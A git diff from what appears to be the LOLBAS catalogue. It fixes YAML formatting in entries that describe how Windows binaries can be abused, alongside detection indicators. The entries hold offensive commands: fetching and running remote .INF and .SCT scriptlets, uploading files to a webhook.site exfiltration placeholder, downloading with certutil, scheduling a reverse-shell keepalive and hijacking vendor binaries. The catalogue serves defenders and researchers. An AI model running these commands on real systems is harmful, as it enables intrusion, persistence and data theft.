Merge pull request #122 from wietze/fixing-yaml-issues

Fixing yaml issues

YML-Template.yml

@@ -2,7 +2,7 @@
 Name: Binary.exe
 Description: Something general about the binary
 Author: The person that created this file
-Created: Date the person created this file
+Created: Date the person created this file (use YYYY-MM-DD without quotes)
 Commands:
   - Command: The command
     Description: Description of the command
@@ -23,9 +23,9 @@ Commands:
 Full_Path:
   - Path: c:\windows\system32\bin.exe
   - Path: c:\windows\syswow64\bin.exe
-Code_Sample: 
+Code_Sample:
   - Code: http://url.com/git.txt
-Detection: 
+Detection:
   - IOC: Event ID 10
   - IOC: binary.exe spawned
 Resources:
@@ -34,7 +34,7 @@ Resources:
   - Link: Threatintelreport...
 Acknowledgement:
   - Person: John Doe
-    Handle: @johndoe
+    Handle: '@johndoe'
   - Person: Ola Norman
-    Handle: @olaNor
+    Handle: '@olaNor'
 ---

yml/LOLUtilz/OSBinaries/Explorer.yml

@@ -2,8 +2,7 @@
 Name: Explorer.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: explorer.exe calc.exe
     Description: 'Executes calc.exe as a subprocess of explorer.exe.'
@@ -14,5 +13,7 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/bohops/status/986984122563391488
-Notes: Thanks to Jimmy - @bohops
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'
 

yml/LOLUtilz/OSBinaries/Netsh.yml

@@ -2,8 +2,7 @@
 Name: Netsh.exe
 Description: Execute, Surveillance
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: |
           netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
@@ -22,5 +21,3 @@ Resources:
   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
   - https://attack.mitre.org/wiki/Technique/T1128
   - https://twitter.com/teemuluotio/status/990532938952527873
-Notes: ''
-

yml/LOLUtilz/OSBinaries/Nltest.yml

@@ -2,8 +2,7 @@
 Name: Nltest.exe
 Description: Credentials
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
     Description: ''
@@ -14,4 +13,6 @@ Detection: []
 Resources:
   - https://twitter.com/sysopfb/status/986799053668139009
   - https://ss64.com/nt/nltest.html
-Notes: Thanks to Sysopfb - @sysopfb
+Acknowledgement:
+  - Person: Sysopfb
+    Handle: '@sysopfb'

yml/LOLUtilz/OSBinaries/Openwith.yml

@@ -2,8 +2,7 @@
 Name: Openwith.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: OpenWith.exe /c C:\test.hta
     Description: Opens the target file with the default application.
@@ -16,5 +15,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/harr0ey/status/991670870384021504
-Notes: Thanks to Matt harr0ey - @harr0ey
+Acknowledgement:
-
+  - Person: Matt harr0ey
+    Handle: '@harr0ey'

yml/LOLUtilz/OSBinaries/Powershell.yml

@@ -2,8 +2,7 @@
 Name: Powershell.exe
 Description: Execute, Read ADS
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: powershell -ep bypass - < c:\temp:ttt
     Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
@@ -14,5 +13,7 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/Moriarty_Meng/status/984380793383370752
-Notes: Thanks to Moriarty - @Moriarty_Meng
+Acknowledgement:
+  - Person: Moriarty
+    Handle: '@Moriarty_Meng'
 

yml/LOLUtilz/OSBinaries/Psr.yml

@@ -2,8 +2,7 @@
 Name: Psr.exe
 Description: Surveillance
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
     Description: Capture screenshots of the desktop and save them in the target .ZIP file.
@@ -18,5 +17,4 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
-Notes: 'Thanks to '
 

yml/LOLUtilz/OSBinaries/Robocopy.yml

@@ -2,8 +2,7 @@
 Name: Robocopy.exe
 Description: Copy
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
     Description: Copy the entire contents of the SourceFolder to the DestFolder.
@@ -16,5 +15,3 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
-Notes: Thanks to Name of guy - @twitterhandle
-

yml/LOLUtilz/OtherBinaries/AcroRd32.yml

@@ -2,8 +2,7 @@
 Name: AcroRd32.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
     Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
@@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/997997818362155008
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/LOLUtilz/OtherBinaries/Gpup.yml

@@ -2,8 +2,7 @@
 Name: Gpup.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
     Description: Execute another command through gpup.exe (Notepad++ binary).
@@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/997892519827558400
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/LOLUtilz/OtherBinaries/Nlnotes.yml

@@ -2,8 +2,7 @@
 Name: Nlnotes.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
     Description: Run PowerShell via LotusNotes.
@@ -14,4 +13,6 @@ Detection: []
 Resources:
   - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
   - https://twitter.com/HanseSecure/status/995578436059127808
-Notes: Thanks to Daniel Bohannon - @danielhbohannon
+Acknowledgement:
+  - Person: Daniel Bohannon
+    Handle: '@danielhbohannon'

yml/LOLUtilz/OtherBinaries/Notes.yml

@@ -2,8 +2,7 @@
 Name: Notes.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
     Description: Run PowerShell via LotusNotes.
@@ -14,4 +13,6 @@ Detection: []
 Resources:
   - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
   - https://twitter.com/HanseSecure/status/995578436059127808
-Notes: Thanks to Daniel Bohannon - @danielhbohannon
+Acknowledgement:
+  - Person: Daniel Bohannon
+    Handle: '@danielhbohannon'

yml/LOLUtilz/OtherBinaries/Nvudisp.yml

@@ -2,8 +2,7 @@
 Name: Nvudisp.exe
 Description: Execute, Copy, Add registry, Create shortcut, kill process
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Nvudisp.exe System calc.exe
     Description: Execute calc.exe as a subprocess.
@@ -23,4 +22,7 @@ Code_Sample: []
 Detection: []
 Resources:
   - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+

yml/LOLUtilz/OtherBinaries/Nvuhda6.yml

@@ -2,8 +2,7 @@
 Name: Nvuhda6.exe
 Description: Execute, Copy, Add registry, Create shortcut, kill process
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: nvuhda6.exe System calc.exe
     Description: Execute calc.exe as a subprocess.
@@ -23,4 +22,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
-Notes: Thanks to Adam - @hexacorn
+Acknowledgement:
+  - Person: Adam
+    Handle: '@hexacorn'

yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml

@@ -2,8 +2,7 @@
 Name: ROCCAT_Swarm.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
     Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
@@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/994213164484001793
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml

@@ -21,7 +21,7 @@ Detection:
 Resources:
  - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
  - Link: https://twitter.com/bartblaze/status/1107390776147881984
- Acknowledgement:
+Acknowledgement:
   - Person: Bart
-    Handle: @bartblaze
+    Handle: '@bartblaze'
 ---

yml/LOLUtilz/OtherBinaries/Setup.yml

@@ -2,8 +2,7 @@
 Name: Setup.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Run Setup.exe
     Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
@@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/994381620588236800
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/LOLUtilz/OtherBinaries/Usbinst.yml

@@ -2,8 +2,7 @@
 Name: Usbinst.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
     Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
@@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/993514357807108096
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml

@@ -2,8 +2,7 @@
 Name: VBoxDrvInst.exe
 Description: Persistence
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
-Categories: []
 Commands:
   - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
     Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
@@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/993497996179492864
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/LOLUtilz/OtherBinaries/aswrundll.yml

@@ -1,20 +1,18 @@
 Name: aswrundll.exe
 Description: This process is used by AVAST antivirus to run and execute any modules
 Author: Eli Salem
-Created: 19\03\2019
+Created: 2019-03-19
 Commands:
-  - Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" 
+  - Command: "\"C:\\Program Files\\Avast Software\\Avast\\aswrundll\" \"C:\\Users\\Public\\Libraries\\tempsys\\module.dll\""
     Description: Load and execute modules using aswrundll
     Usecase: Execute malicious modules using aswrundll.exe
     Category: Execute
     Privileges: Any
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
-- Path: C:\Program Files\Avast Software\Avast\aswrundll
+  - Path: C:\Program Files\Avast Software\Avast\aswrundll
-Code_Sample: 
-- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
 Resources:
- - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
+  - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
- Acknowledgement:
+Acknowledgement:
   - Person: Eli Salem 
-    handle: https://www.linkedin.com/in/eli-salem-954728150
+    Handle: https://www.linkedin.com/in/eli-salem-954728150

yml/LOLUtilz/OtherMSBinaries/Winword.yml

@@ -2,7 +2,7 @@
 Name: winword.exe
 Description: Document editor included with Microsoft Office.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: winword.exe /l dllfile.dll
     Description: Launch DLL payload.
@@ -10,7 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MItreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
@@ -26,4 +26,4 @@ Acknowledgement:
     Handle: '@@vysecurity'
   - Person: Adam (Internals)
     Handle: '@Hexacorn'
----
+---

yml/LOLUtilz/OtherScripts/Testxlst.yml

@@ -2,18 +2,18 @@
 Name: testxlst.js
 Description: Script included with Pywin32.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
-    Categories: Execution
+    Category: Execution
     Privileges: User
     MitreID: T1064
     MitreLink: https://attack.mitre.org/wiki/Technique/T1064
     OperatingSystem: Windows
   - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
-    Categories: Execution
+    Category: Execution
     Privileges: User
     MitreID: T1064
     MitreLink: https://attack.mitre.org/wiki/Technique/T1064
@@ -25,4 +25,6 @@ Detection: []
 Resources:
   - https://twitter.com/bohops/status/993314069116485632
   - https://github.com/mhammond/pywin32
-Notes: Thanks to Jimmy - @bohops
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'

yml/OSBinaries/At.yml

@@ -2,12 +2,12 @@
 Name: At.exe
 Description: Schedule periodic tasks
 Author: 'Freddie Barr-Smith'
-Created: '2019-09-20'
+Created: 2019-09-20
 Commands:
   - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
-    Description: Create a recurring task to execute every day at a specific time. 
+    Description: Create a recurring task to execute every day at a specific time.
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
-    Category: Execute 
+    Category: Execute
     Privileges: Local Admin
     MitreID: T1053
     MitreLink: https://attack.mitre.org/wiki/Technique/T1053
@@ -17,10 +17,10 @@ Full_Path:
   - Path: C:\WINDOWS\SysWOW64\At.exe
 Detection:
   - IOC: Scheduled task is created
-  - IOC: Windows event log - type 3 login 
+  - IOC: Windows event log - type 3 login
   - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
   - IOC: C:\Windows\Tasks\At1.job
-  - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. 
+  - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
 Resources:
   - Link: https://freddiebarrsmith.com/at.txt
   - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator

yml/OSBinaries/Atbroker.yml

@@ -2,7 +2,7 @@
 Name: Atbroker.exe
 Description: Helper binary for Assistive Technology (AT)
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: ATBroker.exe /start malware
     Description: Start a registered Assistive Technology (AT).
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Atbroker.exe
   - Path: C:\Windows\SysWOW64\Atbroker.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
@@ -26,4 +26,4 @@ Resources:
 Acknowledgement:
   - Person: Adam
     Handle: '@hexacorn'
----
+---

yml/OSBinaries/Bash.yml

@@ -2,7 +2,7 @@
 Name: Bash.exe
 Description: File used by Windows subsystem for Linux
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
@@ -39,7 +39,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\bash.exe
   - Path: C:\Windows\SysWOW64\bash.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: Child process from bash.exe
@@ -50,4 +50,4 @@ Acknowledgement:
     Handle: '@aionescu'
   - Person: Asif Matadar
     Handle: '@d1r4c'
----
+---

yml/OSBinaries/Bitsadmin.yml

@@ -2,7 +2,7 @@
 Name: Bitsadmin.exe
 Description: Used for managing background intelligent transfer
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
     Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
@@ -39,7 +39,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\bitsadmin.exe
   - Path: C:\Windows\SysWOW64\bitsadmin.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: Child process from bitsadmin.exe
@@ -56,4 +56,4 @@ Acknowledgement:
     Handle: '@carnal0wnage'
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Certreq.yml

@@ -2,7 +2,7 @@
 Name: CertReq.exe
 Description: Used for requesting and managing certificates
 Author: 'David Middlehurst'
-Created: '2020-07-07'
+Created: 2020-07-07
 Commands:
   - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
     Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\certreq.exe
   - Path: C:\Windows\SysWOW64\certreq.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: certreq creates new files

yml/OSBinaries/Certutil.yml

@@ -2,7 +2,7 @@
 Name: Certutil.exe
 Description: Windows binary used for handling certificates
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
     Description: Download and save 7zip to disk in the current folder.
@@ -44,7 +44,7 @@ Commands:
     MitreID: T1140
     MitreLink: https://attack.mitre.org/wiki/Technique/T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: certutil --decodehex encoded_hexadecimal_InputFileName 
+  - Command: certutil --decodehex encoded_hexadecimal_InputFileName
     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
     Usecase: Decode files to evade defensive measures
     Category: Decode
@@ -55,7 +55,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\certutil.exe
   - Path: C:\Windows\SysWOW64\certutil.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: Certutil.exe creating new files on disk

yml/OSBinaries/Cmd.yml

@@ -2,7 +2,7 @@
 Name: Cmd.exe
 Description: The command-line interpreter in Windows
 Author: 'Ye Yint Min Thu Htut'
-Created: '2019-06-26'
+Created: 2019-06-26
 Commands:
   - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
     Description: Add content to an Alternate Data Stream (ADS).
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\cmd.exe
   - Path: C:\Windows\SysWOW64\cmd.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: cmd.exe executing files from alternate data streams.

yml/OSBinaries/Cmdkey.yml

@@ -1,8 +1,8 @@
 ---
-Name: Cmdkey.exe 
+Name: Cmdkey.exe
 Description: creates, lists, and deletes stored user names and passwords or credentials.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: cmdkey /list
     Description: List cached credentials
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\cmdkey.exe
   - Path: C:\Windows\SysWOW64\cmdkey.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Usage of this command could be an IOC
@@ -23,6 +23,6 @@ Resources:
   - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
   - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
 Acknowledgement:
-  - Person: 
+  - Person:
     Handle:
----
+---

yml/OSBinaries/Cmstp.yml

@@ -2,11 +2,11 @@
 Name: Cmstp.exe
 Description: Installs or removes a Connection Manager service profile.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
     Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
-    Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. 
+    Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
     Category: Execute
     Privileges: User
     MitreID: T1191
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
-    Usecase: Execute code hidden within an inf file. Execute code directly from Internet. 
+    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
     Category: AwL bypass
     Privileges: User
     MitreID: T1191
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\cmstp.exe
   - Path: C:\Windows\SysWOW64\cmstp.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Execution of cmstp.exe should not be normal unless VPN is in use
@@ -40,4 +40,4 @@ Acknowledgement:
     Handle: '@oddvarmoe'
   - Person: Nick Tyrer
     Handle: '@NickTyrer'
----
+---

yml/OSBinaries/ConfigSecurityPolicy.yml

@@ -2,7 +2,7 @@
 Name: ConfigSecurityPolicy.exe
 Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
 Author: 'Ialle Teixeira'
-Created: '04/09/2020'
+Created: 2020-09-04
 Commands:
   - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
     Description: Upload file, credentials or data exfiltration in general
@@ -14,9 +14,9 @@ Commands:
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
-Code_Sample: 
+Code_Sample:
-  - Code: 
+  - Code:
-Detection: 
+Detection:
   - IOC: ConfigSecurityPolicy storing data into alternate data streams.
   - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
   - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.

yml/OSBinaries/Control.yml

@@ -2,7 +2,7 @@
 Name: Control.exe
 Description: Binary used to launch controlpanel items in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: control.exe c:\windows\tasks\file.txt:evil.dll
     Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\control.exe
   - Path: C:\Windows\SysWOW64\control.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Control.exe executing files from alternate data streams.
@@ -28,4 +28,4 @@ Resources:
 Acknowledgement:
   - Person: Jimmy
     Handle: '@bohops'
----
+---

yml/OSBinaries/Csc.yml

@@ -1,8 +1,8 @@
 ---
 Name: Csc.exe
-Description: Binary file used by .NET to compile C# code 
+Description: Binary file used by .NET to compile C# code
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: csc.exe -out:My.exe File.cs
     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
@@ -23,13 +23,13 @@ Commands:
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: Csc.exe should normally not run a system unless it is used for development. 
+ - IOC: Csc.exe should normally not run a system unless it is used for development.
 Resources:
   - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
 Acknowledgement:
-  - Person: 
+  - Person:
     Handle:
----
+---

yml/OSBinaries/Cscript.yml

@@ -2,7 +2,7 @@
 Name: Cscript.exe
 Description: Binary used to execute scripts in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: cscript c:\ads\file.txt:script.vbs
     Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\cscript.exe
   - Path: C:\Windows\SysWOW64\cscript.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Cscript.exe executing files from alternate data streams
@@ -25,4 +25,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Desktopimgdownldr.yml

@@ -2,7 +2,7 @@
 Name: Desktopimgdownldr.exe
 Description: Windows binary used to configure lockscreen/desktop image
 Author: Gal Kristal
-Created: 28/06/2020
+Created: 2020-06-28
 Commands:
   - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
     Description: Downloads the file and sets it as the computer's lockscreen
@@ -14,9 +14,9 @@ Commands:
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\desktopimgdownldr.exe
-Code_Sample: 
+Code_Sample:
-  - Code: 
+  - Code:
-Detection: 
+Detection:
   - IOC: desktopimgdownldr.exe that creates non-image file
   - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
 Resources:

yml/OSBinaries/Dfsvc.yml

@@ -2,9 +2,9 @@
 Name: Dfsvc.exe
 Description: ClickOnce engine in Windows used by .NET
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
-  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo 
+  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
     Description: Executes click-once-application from Url
     Usecase: Use binary to bypass Application whitelisting
     Category: AWL bypass
@@ -17,14 +17,14 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
   - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
----
+---

yml/OSBinaries/Diantz.yml

@@ -2,11 +2,11 @@
 Name: Diantz.exe
 Description: Binary that package existing files into a cabinet (.cab) file
 Author: 'Tamir Yehuda'
-Created: '08/08/2020'
+Created: 2020-08-08
 Commands:
